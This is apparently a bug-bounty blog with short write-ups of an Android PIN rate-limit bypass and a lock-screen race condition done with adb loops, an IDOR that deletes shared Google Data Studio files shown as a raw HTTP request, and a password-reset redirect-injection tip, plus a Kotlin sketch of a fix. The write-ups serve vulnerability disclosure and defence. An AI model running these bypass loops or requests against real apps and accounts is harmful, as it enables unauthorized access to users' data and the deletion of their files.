Monday, July 8, 2024

Android pin bypass with rate limiting


Application pin rate limiting bypass

The bug was found in a private program.

There is a feature to lock the mobile app with a PIN, but only 3 attempts are allowed. If we enter a wrong PIN 3 times, the app logs us out.

But there is a misconfiguration in this feature. If you enter the PIN 2 times, close the app and open it again, you get another 3 attempts. So the rate limiting is bypassed by closing the app and calling the main activity again.

You can launch the main activity as many times as you want with adb:

while true; do
  adb shell am start -a android.intent.action.VIEW -n com.redacted/com.redacted.MainActivity
  sleep 4
done

During the sleep interval you can enter the PIN 2 times; then the main activity is called again, so you can enter the PIN again.

Impact :- mobile auth PIN rate limiting bypassed

No thanks for reading ..!

Creative Android pin bypass with Race condition


Hitting the main activity multiple times lets you view any activity inside the app without even entering the mobile PIN.

Bug :-

The application has a mobile PIN lock; without entering the PIN you can't get into the app.

Bypass :-

But by calling internal activities like settings.activity and notifications.activity in a race condition, the app shows the settings page and the profile page. The problem is that it only lets us see them for a few seconds, so we need to automate it and take a screenshot each time we call the activities.

for i in $(seq 20); do
  adb shell am start -a android.intent.action.VIEW -n com.redacted.android/.MainActivity -d "https://redacted.com/notifications"
  adb shell screencap /sdcard/tmp/$i.png
done

The above command runs 20 times, taking a screenshot of the frontend each time and saving it under /sdcard/tmp on the device.

Impact :

The attacker can't bypass the PIN completely, but can view the content inside the app and learn sensitive info like the amount and profile info.
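Both bugs above come from lock state that lives only in the activity: the attempt counter is lost when the activity is relaunched, and screens other than MainActivity never check the lock at all. The following added example (my own Kotlin sketch, not code from the affected app) persists the failure counter so relaunching via `am start` cannot reset it, keeps the unlocked flag in memory only, and routes every screen through one base activity that refuses to inflate a layout until the PIN has been entered. It assumes a PinActivity exists that calls `recordFailure()`/`reset()` and sets `SessionLock.unlocked`; all names are illustrative.

```kotlin
import android.app.Activity
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.view.WindowManager

// Failed-attempt counter is persisted, so finishing and relaunching the
// activity with `am start` does not hand out a fresh set of attempts.
class PinAttemptGuard(context: Context) {
    private val prefs = context.getSharedPreferences("pin_guard", Context.MODE_PRIVATE)

    fun attemptsLeft(): Int = (MAX_ATTEMPTS - prefs.getInt(KEY_FAILS, 0)).coerceAtLeast(0)

    // Returns true once the limit is reached; the caller then logs the user out.
    fun recordFailure(): Boolean {
        val fails = prefs.getInt(KEY_FAILS, 0) + 1
        prefs.edit().putInt(KEY_FAILS, fails).commit() // synchronous write: survives an immediate kill
        return fails >= MAX_ATTEMPTS
    }

    fun reset() { prefs.edit().remove(KEY_FAILS).commit() }

    companion object { const val MAX_ATTEMPTS = 3; private const val KEY_FAILS = "fails" }
}

// Deliberately in-memory only: process death or a fresh launch re-locks the app.
object SessionLock { @Volatile var unlocked = false }

// Every screen extends this instead of Activity, so a deep link straight to
// settings or notifications hits the same gate as MainActivity. No layout is
// inflated while locked, so there is nothing for a screenshot to capture.
abstract class LockedActivity : Activity() {
    final override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        window.addFlags(WindowManager.LayoutParams.FLAG_SECURE) // secure surface: screenshots render black
        if (!SessionLock.unlocked) { bounceToPin(); return }
        onCreateUnlocked(savedInstanceState)
    }

    override fun onResume() {
        super.onResume()
        if (!SessionLock.unlocked) bounceToPin() // covers return-from-background too
    }

    private fun bounceToPin() {
        startActivity(Intent(this, PinActivity::class.java))
        finish()
    }

    // Subclasses call setContentView(...) here; it never runs while locked.
    protected abstract fun onCreateUnlocked(savedInstanceState: Bundle?)
}
```

For a stricter lockout the counter can be kept server-side as well, so a reinstall or cleared app data does not reset it either.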

NO thanks for reading

IDOR in a Google product


Description :

An attacker is able to delete any file through the vulnerable endpoint.

Endpoint :

POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
Host: datastudio.google.com
Connection: close
Content-Length: 54
Sec-Fetch-Mode: cors
Origin: https://datastudio.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
encoding: null
Sec-Fetch-Site: same-origin
Referer: https://datastudio.google.com/u/4/navigation/reporting
Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;

{"id":"9c491b49-a2f7-49fe-bd91-c4783657781","type":0}

Vulnerable parameter : id

Guessing the id is not possible here, but if the victim has shared the file, the id is visible in the URL path.

Triage Time

September 29, 2019 : Reported

Oct 1, 2019 : Triaged

Oct 8, 2019 : bounty awarded $5k

No thanks for reading the report :-

The Reset Password Attack Vector


Hey Guys,

Recently I have seen this attack vector a lot.
While resetting the password, check for any redirect, callback or returnurl parameters in the POST body.

Or try to brute-force parameters using a tool like Param Miner,
and try to change it to a custom bind payload.

Then check whether you get the payload link in the email.
